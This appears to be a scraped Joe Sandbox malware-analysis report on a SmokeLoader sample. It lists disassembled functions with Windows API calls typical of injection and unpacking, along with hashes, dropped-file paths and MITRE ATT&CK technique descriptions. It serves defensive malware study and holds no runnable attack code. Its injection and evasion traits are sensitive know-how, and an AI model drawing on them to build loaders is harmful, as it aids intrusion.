Instruction Fuzzy Hash: 71113670D41A10CBDB20EB6099857DABB64FBC8365F92043BD94997251CA3C88E18B99

Function 004151B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041528F
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004152CC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004152EB

Strings

, xrefs: 004151F5

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
Instruction ID: 6a590a8926acfa3c7df48d762a2d30e232421f7677ab7ce89d68225f10d6884e
Opcode Fuzzy Hash: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
Instruction Fuzzy Hash: DE311C20A5B680CBF301CB78F8047923E62BB25744F44847895498B3A5EBBA5534E7EF

Function 02DFF805 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DFF82D
Module32First.KERNEL32(00000000,00000224), ref: 02DFF84D

Memory Dump Source

Source File: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2dfc000_wafguag.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3e06f5777bcf43999863293470825928c612fae344323b3847b200e3b693b6b5
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0DF0F631100311AFD7603BF4988CB6E72ECEF48724F21052CE74291AC0CB70EC058A64

Function 02C80E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C80223,?,?), ref: 02C80E19
SetErrorMode.KERNELBASE(00000000,?,?,02C80223,?,?), ref: 02C80E1E

Memory Dump Source

Source File: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c80000_wafguag.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ac362fad639c5c9b64cd8f07aeb9a6a6ad7bb22d7ae53432970dca695a8b64fe
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8ED0123214512877D7003A94DC09BCE7B1CDF05B66F008011FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02DFF4C4 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DFF515

Memory Dump Source

Source File: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2dfc000_wafguag.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ae8943e9392b5b2e70627194635452ba8774c90383d3fb8a07b39724936d13cf
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 67112A79A00208EFDB01DF98C985E99BBF5AF08350F068094FA489B361D371EA50DF94

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415180 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415848), ref: 00415188

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
Instruction ID: f865e6b2e3803cbb86dad00ce2678956489d20d1f66e016f0fea3cba8c339ba6
Opcode Fuzzy Hash: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
Instruction Fuzzy Hash: 79B092B09822009BE2408FB0A844B513A65B308342F414821F60886280CA2164208F14

Non-executed Functions

Function 00415380 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004153B1
WritePrivateProfileStringA.KERNEL32(00417378,00417354,0041732C,0041731C), ref: 004153D5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004153DD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041541D
GetComputerNameW.KERNEL32(?,?), ref: 00415431
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041543F
OpenJobObjectA.KERNEL32(00000000,00000000,004173A0), ref: 0041544E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041545F

Strings

-, xrefs: 0041546C

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
Instruction ID: 204a2022625e4fb3e4702eb5f8edaa10a17d11f6e745e2405329eac1171ae186
Opcode Fuzzy Hash: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
Instruction Fuzzy Hash: 95210831A44348EBE720DFA4DC85BD97B70EB4C752F1180AAFA49AA1C0CAF459C4CF59

Function 004154A0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004154D4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004154EF
HeapDestroy.KERNEL32(00000000), ref: 0041550E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415516

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
Instruction ID: fa24f5b182106e8a66cc9c052caed5fc4614bc77b159341e0b6937d28379f147
Opcode Fuzzy Hash: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
Instruction Fuzzy Hash: 4B01A770A41508EBE750EBB4ED45BDA7BB8B70C346F404037EA0597281DA745D90CB59

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report K80v6DHFHE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\wafguag

C:\Users\user\AppData\Roaming\wafguag:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
K80v6DHFHE.exe

Function 00415530 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 302
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02B8016D Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02C7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00415867 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Function 004151B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02C70E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON